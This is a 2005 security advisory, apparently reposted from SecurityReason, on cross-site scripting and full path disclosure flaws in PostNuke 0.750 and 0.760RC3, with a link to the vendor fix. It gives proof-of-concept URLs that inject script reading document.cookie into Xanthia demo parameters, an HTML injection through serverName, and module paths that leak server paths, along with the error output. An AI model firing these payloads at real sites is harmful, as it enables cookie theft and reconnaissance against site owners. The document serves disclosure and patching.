https://cxsecurity.com/issue/WLB-2005090044

漏洞细节尚未披露

Hash: SHA1

[PostNuke XSS and Full path disclosure 0.760RC3=>x cXIb8O3.7]

Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 15.3.2005
from SECURITYREASON.COM

- --- 0.Description ---

PostNuke: The Phoenix Release (0.750) and (0.760RC3)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/

- --- 1. Cross Site Scripting ---
1.0
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E
etc.

1.1
If you can see php error and register global = On
http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>
or for 0.750
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>


- --- 2. Full path disclosure ---

2.0
http://[HOST]/[DIR]/modules/Xanthia/pndocs/themes/theme.php

Error message :
- ---------------
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) [function.main]: failed to open stream: No
such file or directory in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8

Fatal error: main() [function.require]: Failed opening required
'/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8
- ---------------


2.1
http://[HOST]/[DIR]/modules/Xanthia/pnclasses/Xanthia.php

Error message :
- ---------------
Fatal error: Call to undefined function pnModGetVar() in
/www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on line 48
- ---------------


2.2
http://[HOST]/[DIR]/modules/Blocks/pnblocks/user.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/thelang.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/text.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/html.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/menu.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/finclude.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/button.php


Error message :
- ---------------
Fatal error: Call to undefined function pnSecAddSchema() in
/www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on line 48
- ---------------


2.3
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php
or for 0.760RC3
http://[HOST]/[DIR]/modules/Multisites/installation/config.php


Error message :
- ---------------
Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open stream: No such file or directory in
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2

Warning: main() [function.include]: Failed opening 'parameters/whoisit.inc.php' for inclusion (include_path='.:') in
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2
- ---------------


2.4
http://[HOST]/[DIR]/xmlrpc.php


Error message :
- ---------------
Fatal error: Cannot redeclare xmlrpc_decode() in /www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line 1068
- ---------------


- --- 3. How to fix ---
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

- --- 4.Contact ---
Author: Maksymilian Arciemowicz